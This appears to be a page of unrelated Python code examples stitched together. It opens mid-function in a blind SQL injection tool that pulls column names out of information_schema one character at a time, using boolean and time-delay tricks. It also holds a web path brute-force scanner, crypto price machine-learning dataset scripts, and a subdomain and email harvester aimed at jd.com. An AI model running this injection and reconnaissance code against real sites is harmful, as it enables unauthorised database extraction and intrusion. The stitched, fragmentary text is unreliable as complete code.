                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # Then inject the length of the column name
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            retVal = build_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                lens=self.len,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # Then inject the column name itself
                            # Reset column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))
                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = build_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    lens=self.len,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # Append the column_name to the list
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "time":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = time_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # Then inject the length of the column name
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))
                            retVal = time_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                times=self.time,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # Then inject the column name itself
                            # Reset column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))

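                            # Same character-at-a-time extraction as the build
                            # branch, but each value is inferred from response delays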
                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = time_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    times=self.time,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # Append the column_name to the list
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                # Convert the injected columns_name list into a tuple
                self.columns_name[database_name][table_name] = tuple(
                    columns_name)
        logger.info("Sqli result:")
        # Print all the column names
        for database_name in self.columns_name:
            for table_name in self.columns_name[database_name]:
                columns_name = ','.join(
                    self.columns_name[database_name][table_name])
                logger.info("Table %s has columns %s", table_name,
                            columns_name)
            tables_name = ','.join(self.columns_name[database_name])
            logger.info("Database %s has tables %s", database_name,
                        tables_name)

        print "[*]Columns list:", self.columns_name
Exemple #52
0
def info(message):
    """info log"""
    log.info(message)
Exemple #53
0
        # Iterate over the list of paths we want to try
        for brute in attempt_list:

            url = "%s%s" % (target_url, urllib.quote(brute))
            # print url
            try:
                headers = {}
                headers["User-Agent"] = conf['ua']
                r = urllib2.Request(url, headers=headers)
                # pbar.update(1)
                try:
                    response = urllib2.urlopen(r, timeout=2)
                except urllib2.HTTPError:
                    raise  # let the outer handler report non-404 status codes
                except Exception:
                    logger.error("Time out...")
                    continue  # the request may otherwise hang

                # Sleep after each request to throttle the scan
                time.sleep(stime)

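                # Treat any status other than 404 as a hit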
                if response.code != 404:
                    logger.info("Get !!!!" + url)
                    tqdm.write("[%d] => %s" % (response.code, url))

            except urllib2.URLError, e:
                if hasattr(e, 'code') and e.code != 404:
                    tqdm.write("!!! %d => %s" % (e.code, url))

    logger.info("The dictionary queue is empty")
    pbar.close()
    exit(0)
Exemple #54
0
def build(source_index, dest_index, W=10):
    ohlcv_index = load_preprocessed('ohlcv')
    cm_index = load_preprocessed('coinmetrics.io')
    index = {}

    for _sym in ohlcv_index.keys():
        if _sym not in cm_index:
            logger.warning('Missing blockchain data for {}'.format(_sym))
            continue

        logger.info('Building {}'.format(_sym))
        ohlcv = pd.read_csv(ohlcv_index[_sym]['csv'],
                            sep=',',
                            encoding='utf-8',
                            index_col='Date',
                            parse_dates=True)
        cm = pd.read_csv(cm_index[_sym]['csv'],
                         sep=',',
                         encoding='utf-8',
                         index_col='Date',
                         parse_dates=True)

        # Build resampled OHLCV and TA features
        ohlcv_3d = builder.periodic_ohlcv_resample(ohlcv, period=3, label=True)
        ohlcv_7d = builder.periodic_ohlcv_resample(ohlcv, period=7, label=True)
        ohlcv_30d = builder.periodic_ohlcv_resample(ohlcv,
                                                    period=30,
                                                    label=True)
        ta = builder.features_ta(ohlcv)
        ta_3d = builder.period_resampled_ta(ohlcv, period=3)
        ta_7d = builder.period_resampled_ta(ohlcv, period=7)
        ta_30d = builder.period_resampled_ta(ohlcv, period=30)

        # Build target percent variation
        close = ohlcv['close']
        target_pct = builder.target_price_variation(ohlcv['close'], periods=1)
        target_class = builder.target_discrete_price_variation(target_pct)
        target_binary = builder.target_binary_price_variation(target_pct)
        target_labels = builder.target_label(target_class,
                                             labels=['SELL', 'HOLD', 'BUY'])
        target_binary_labels = builder.target_label(target_binary,
                                                    labels=['SELL', 'BUY'])
        target_bin = builder.target_binned_price_variation(target_pct,
                                                           n_bins=3)
        target_bin_binary = builder.target_binned_price_variation(target_pct,
                                                                  n_bins=2)
        target_bin_labels = builder.target_label(
            target_bin, labels=['SELL', 'HOLD', 'BUY'])
        target_bin_binary_labels = builder.target_label(target_bin_binary,
                                                        labels=['SELL', 'BUY'])
        # Merge all the datasets
        dataframes = [
            ohlcv, ohlcv_3d, ohlcv_7d, ohlcv_30d, ta, ta_3d, ta_7d, ta_30d, cm
        ]  #, social_pct]
        df = pd.concat(dataframes,
                       axis='columns',
                       verify_integrity=True,
                       sort=True,
                       join='inner')
        target = pd.concat([
            close, target_pct, target_class, target_binary, target_bin,
            target_bin_binary, target_labels, target_binary_labels,
            target_bin_labels, target_bin_binary_labels
        ],
                           axis=1)
        target.columns = [
            'close', 'pct', 'class', 'binary', 'bin', 'binary_bin', 'labels',
            'binary_labels', 'bin_labels', 'binary_bin_labels'
        ]
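        # Trim the targets to the date range where the merged features are valid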
        target = target.loc[df.first_valid_index():df.last_valid_index()]
        # Save resulting dataset both in CSV and Excel format
        logger.info('Saving {}'.format(_sym))
        feature_groups = {
            'ohlcv': [c for c in ohlcv.columns],
            'ohlcv_3d': [c for c in ohlcv_3d.columns],
            'ohlcv_7d': [c for c in ohlcv_7d.columns],
            'ohlcv_30d': [c for c in ohlcv_30d.columns],
            'ta': [c for c in ta.columns],
            'ta_3d': [c for c in ta_3d.columns],
            'ta_7d': [c for c in ta_7d.columns],
            'ta_30d': [c for c in ta_30d.columns],
            'cm': [c for c in cm.columns],
            # 'social_pct': [c for c in social_pct.columns],
        }
        save_symbol_dataset(dest_index,
                            _sym,
                            df,
                            target=target,
                            feature_groups=feature_groups)
        logger.info('Saved {}'.format(_sym))
Exemple #55
0
def main():
    index = load_dataset('all_merged', return_index=True)
    resultFile = './data/datasets/all_merged/estimators/randomforest_sfm_hyperparameters.json'
    hyperparameters = {}
    if not os.path.exists(resultFile):
        logger.error('no hyperparameters!')
        return
    with open(resultFile, 'r') as f:
        hyperparameters = json.load(f)
    for _sym, data in index.items():
        if _sym not in hyperparameters or not os.path.exists(
                hyperparameters[_sym]['estimator']):
            logger.error('{} does not exist.'.format(_sym))
        else:
            features = pd.read_csv(data['csv'],
                                   sep=',',
                                   encoding='utf-8',
                                   index_col='Date',
                                   parse_dates=True)
            # Replace infinities with NaN so they can later be imputed to finite values
            features = features.replace([np.inf, -np.inf], np.nan)
            #features = features[hyperparameters['feature_importances']]

            # Derive target classes from closing price
            target_pct = target_price_variation(features['close'])
            target = target_binned_price_variation(target_pct, n_bins=2)
            # target = target_discrete_price_variation(target_pct)

            # Split data in train and blind test set with 70:30 ratio,
            #  most ML models don't take sequentiality into account, but our pipeline
            #  uses a SimpleImputer with mean strategy, so it's best not to shuffle the data.
            X_train, X_test, y_train, y_test = train_test_split(
                features.values, target.values, shuffle=False, test_size=0.3)
            # Summarize distribution
            print("Training set: # Features {}, # Samples {}".format(
                X_train.shape[1], X_train.shape[0]))
            plot_class_distribution("Training set", _sym, y_train)
            print("Test set: # Features {}, # Samples {}".format(
                X_test.shape[1], X_test.shape[0]))
            plot_class_distribution("Test set", _sym, y_test)
            if not np.isfinite(X_train).all():
                logger.warning("Training x is not finite!")
            if not np.isfinite(y_train).all():
                logger.warning("Training y is not finite!")
            if not np.isfinite(X_test).all():
                logger.warning("Test x is not finite!")
            if not np.isfinite(y_test).all():
                logger.warning("Test y is not finite!")

            # Take the fitted ensemble with tuned hyperparameters
            clf = None
            with open(hyperparameters[_sym]['estimator'], 'rb') as f:
                clf = pickle.load(f)

            # Test ensemble's performance on training and test sets
            logger.info("Classification report on train set")
            predictions1 = clf.predict(X_train)
            train_report = classification_report(y_train,
                                                 predictions1,
                                                 output_dict=True)
            print(classification_report(y_train, predictions1))
            logger.info("Classification report on test set")
            predictions2 = clf.predict(X_test)
            test_report = classification_report(y_test,
                                                predictions2,
                                                output_dict=True)
            print(classification_report(y_test, predictions2))
            stats = {
                'score': accuracy_score(y_train, predictions1),
                'mse': mean_squared_error(y_train, predictions1),
                'test_score': accuracy_score(y_test, predictions2),
                'test_mse': mean_squared_error(y_test, predictions2),
                'train_report': train_report,
                'test_report': test_report,
            }
            print(stats)
            print("--- end ---")
Exemple #56
0
def build_atsa_dataset(source_index, W=10):
    _dataset = load_dataset(source_index, return_index=True)
    index = {}

    for _sym, entry in _dataset.items():
        _df = pd.read_csv(entry['csv'],
                          sep=',',
                          encoding='utf-8',
                          index_col='Date',
                          parse_dates=True)
        _target = pd.read_csv(entry['target_csv'],
                              sep=',',
                              encoding='utf-8',
                              index_col='Date',
                              parse_dates=True)
        ohlcv = _df[entry['features']['ohlcv']]
        ta = _df[entry['features']['ta']]

        # Build the dataframe with base features
        ohlc = ohlcv[['open', 'high', 'low', 'close']]
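        # Concatenate raw OHLC with its W lagged copies
        # (builder.make_lagged(ohlc, i) for i = 1..W) as autoregressive inputs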
        lagged_ohlc = pd.concat(
            [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')
        # Add lagged features to the dataframe
        atsa_df = pd.concat([lagged_ohlc, ta],
                            axis='columns',
                            verify_integrity=True,
                            sort=True,
                            join='inner')

        # Drop the first 30 rows (NaNs from lagging and indicator warm-up)
        atsa_df = atsa_df[30:]

        # Save the dataframe
        atsa_df.to_csv('data/datasets/all_merged/csv/{}_atsa.csv'.format(
            _sym.lower()),
                       sep=',',
                       encoding='utf-8',
                       index=True,
                       index_label='Date')
        atsa_df.to_excel('data/datasets/all_merged/excel/{}_atsa.xlsx'.format(
            _sym.lower()),
                         index=True,
                         index_label='Date')
        # decompose_dataframe_features('all_merged', _sym+'_improved', unlagged_df)
        # Add symbol to index
        index[_sym] = {
            'csv':
            'data/datasets/all_merged/csv/{}_atsa.csv'.format(_sym.lower()),
            'xls':
            'data/datasets/all_merged/excel/{}_atsa.xlsx'.format(_sym.lower()),
            'target_csv':
            'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()),
            'target_xls':
            'data/datasets/all_merged/excel/{}_target.xlsx'.format(
                _sym.lower()),
            'features': {
                'atsa': [c for c in atsa_df.columns],
            }
        }
        logger.info('Saved {} in data/datasets/all_merged/'.format(_sym))
    with open('data/datasets/all_merged/index_atsa.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
Exemple #57
0
    def run(self):
        url = self.base_url.format(domain=self.domain)
        #print url
        try:
            self.resp = http_request_get(url).content
            if self.resp:
                self.subdomains = self.get_hostnames()
                self.email = self.get_email()
                # Only collect domains once a response was actually received
                for domain in self.subdomains:
                    self.domain_name.append(domain)
        except Exception, e:
            logger.error("Error in {0}: {1}".format(
                __file__.split('/')[-1], e))
        finally:
            logger.info("{0} found {1} domains".format(self.engine_name,
                                                       len(self.domain_name)))
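            # Note: returning inside finally suppresses any exception
            # raised in the try block above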
            return self.domain_name, self.smiliar_domain_name, self.email

    def get_hostnames(self):
        rawres = parser(self.resp, self.domain)
        return rawres.hostnames()

    def get_email(self):
        rawres = parser(self.resp, self.domain)
        return rawres.emails()


if __name__ == "__main__":
    x = CrtSearch("jd.com")
    print x.run()